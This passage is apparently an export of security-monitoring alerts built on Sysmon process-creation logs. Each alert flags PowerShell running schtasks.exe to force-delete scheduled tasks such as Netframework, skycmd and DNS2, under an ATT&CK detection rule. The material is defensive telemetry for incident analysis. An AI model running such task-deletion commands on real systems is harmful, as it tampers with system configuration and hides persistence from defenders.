Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.089",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.720 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001030a81e00} +ProcessId: 6192 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.736247100Z"",""eventRecordID"":""2508"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.720\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001030a81e00}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.720"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001030a81e00}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.059",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.695 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001070a61e00} +ProcessId: 7116 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.697171200Z"",""eventRecordID"":""2507"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.695\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001070a61e00}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.695"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001070a61e00}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.036",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.669 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b0a41e00} +ProcessId: 1988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.681281500Z"",""eventRecordID"":""2506"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.669\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b0a41e00}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.669"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010b0a41e00}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.015",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.645 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001027a21e00} +ProcessId: 2280 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.648014900Z"",""eventRecordID"":""2505"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.645\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001027a21e00}\r\nProcessId: 2280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.645"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001027a21e00}"",""processId"":""2280"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.989",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.618 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ec9f1e00} +ProcessId: 6948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.620671600Z"",""eventRecordID"":""2504"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.618\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ec9f1e00}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.618"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010ec9f1e00}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.965",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.588 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010f59d1e00} +ProcessId: 4716 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.593133700Z"",""eventRecordID"":""2503"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.588\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010f59d1e00}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.588"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010f59d1e00}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 